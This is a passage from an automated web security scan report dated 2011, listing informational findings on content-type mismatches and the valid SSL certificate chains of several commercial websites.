Date: Sat, 26 Mar 2011 17:03:28 GMT
Connection: close
Vary: Accept-Encoding

fechaHoraActual=26/03/2011 17:03:00
31.31. http://www.paperg.com/jsfb/embed.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /jsfb/embed.php?pid=3922&bid=2123 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/archives/'+NSFTW+'?ordering=&searchphrase=all
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:13:22 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 45225
Connection: Keep-alive
Via: 1.1 AN-0016020122637050


var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL2123 = 'http://www.
...[SNIP]...
31.32. http://www.trafficland.com/bing/data.cry  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.trafficland.com
Path:   /bing/data.cry

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /bing/data.cry?ut=2437a0ba-1b90-4bfa-b90f-f013f6d9e848&cb=8ef6ac22-7768-4e2e-bc3b-28082c1838d2 HTTP/1.1
Host: www.trafficland.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 00:56:33 GMT
Server: Apache
Last-Modified: Sat, 26 Mar 2011 00:53:30 GMT
ETag: "1e770-73850-49f582398d680"
Accept-Ranges: bytes
Content-Length: 473168
Content-Type: text/plain; charset=UTF-8

.X~...L....M6...Q.+Jo!oc....)...Z....:Z1Y..@.pa....8.&........lW7.*B.z..gq.x...+.....p....p.;.......V....t.q.......>..W.....~ET;.[.i..$.^...[.^...e.....P..w...z.6!-......k./.....eaP....7..^.....%....i
...[SNIP]...
32. SSL certificate  previous
There are 7 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

32.1. https://secure.avangate.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.avangate.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Thu Oct 07 19:00:00 CDT 2010
Valid to:  Wed Oct 26 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028
32.2. https://secure.shareit.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.shareit.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.shareit.com
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Tue Aug 03 19:00:00 CDT 2010
Valid to:  Thu Nov 03 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 19:00:00 CDT 2009
Valid to:  Sun Mar 24 18:59:59 CDT 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 19:00:00 CDT 1998
Valid to:  Tue Aug 01 18:59:59 CDT 2028
32.3. https://www.godaddy.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.GoDaddy.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Tue Jan 04 10:21:18 CST 2011
Valid to:  Mon Jan 14 16:28:36 CST 2013

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Thu Jun 29 12:06:20 CDT 2034
32.4. https://www.plimus.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.plimus.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.plimus.com
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Wed May 05 19:00:00 CDT 2010
Valid to:  Fri May 13 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 19:00:00 CDT 2009
Valid to:  Sun Mar 24 18:59:59 CDT 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 19:00:00 CDT 1998
Valid to:  Tue Aug 01 18:59:59 CDT 2028
32.5. https://www.supermedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.supermedia.com
Issued by:  Trusted Secure Certificate Authority
Valid from:  Mon Feb 21 18:00:00 CST 2011
Valid to:  Wed Feb 22 17:59:59 CST 2012

Certificate chain #1

Issued to:  Trusted Secure Certificate Authority
Issued by:  AddTrust External CA Root
Valid from:  Mon May 24 19:00:00 CDT 2010
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020
32.6. https://www.territoryahead.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.territoryahead.com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Mon Oct 11 19:00:00 CDT 2010
Valid to:  Fri Oct 11 18:59:59 CDT 2013

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Wed Jul 16 18:59:59 CDT 2036
32.7. https://www2.hbc.com/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.hbc.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www2.hbc.com
Issued by:  Entrust Certification Authority - L1C
Valid from:  Fri Oct 22 15:25:22 CDT 2010
Valid to:  Tue Nov 15 14:55:21 CST 2011

Certificate chain #1

Issued to:  Entrust Certification Authority - L1C
Issued by:  Entrust.net Certification Authority (2048)
Valid from:  Thu Dec 10 14:43:54 CST 2009
Valid to:  Tue Dec 10 15:13:54 CST 2019

Certificate chain #2

Issued to:  Entrust.net Certification Authority (2048)
Issued by:  Entrust.net Certification Authority (2048)
Valid from:  Fri Dec 24 11:50:51 CST 1999
Valid to:  Tue Jul 24 09:15:12 CDT 2029
Report generated by XSS.CX at Fri Apr 01 09:37:54 CDT 2011.